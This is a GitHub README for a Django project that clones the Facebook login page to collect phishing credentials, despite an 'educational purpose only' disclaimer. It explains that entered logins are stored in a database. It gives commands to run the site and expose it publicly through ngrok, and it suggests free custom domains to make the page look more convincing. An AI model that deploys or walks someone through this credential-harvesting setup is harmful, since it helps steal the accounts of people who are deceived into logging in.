Skip to content

nirajpoudel/Phishing-with-Social-Engineering

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

31 Commits
 
 
 
 

Repository files navigation

Phishing with Social Engineering

Note: This is just for educational purpose only.

This is the simple facebook login and register clone page developed using django. The intention of this project is to explore tools and learn new skills. It is not developed to harm anyone. The facebook login form is developed with html and css and backend used for this project is python and django. Sqlite is used as a databse.

How to use it?

Before diving into this you must have a python3 installed in your system. If you want to bring it to the internet you must have ngrok installed in the system.

Step 1: Clone the repository.

git clone https://github.com/nirajpoudel18/Phishing-with-Social-Engineering.git

Step 2: Download requirements.txt file.

pip install -r requirements.txt

Step 3: Run manage.py file in the local server.

python3 manage.py runserver 8000

Step 4: Run ngrok in the port 8000.

ngrok http 8000

Desktop view:

Mobile view:

Only the login form is connect with database for now. Further update will be available in the later future. The free version of ngrok doesnot provide the domain customization. If you want to customize domain you can register free domains at Freenom.

About

Phishing with facebook.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages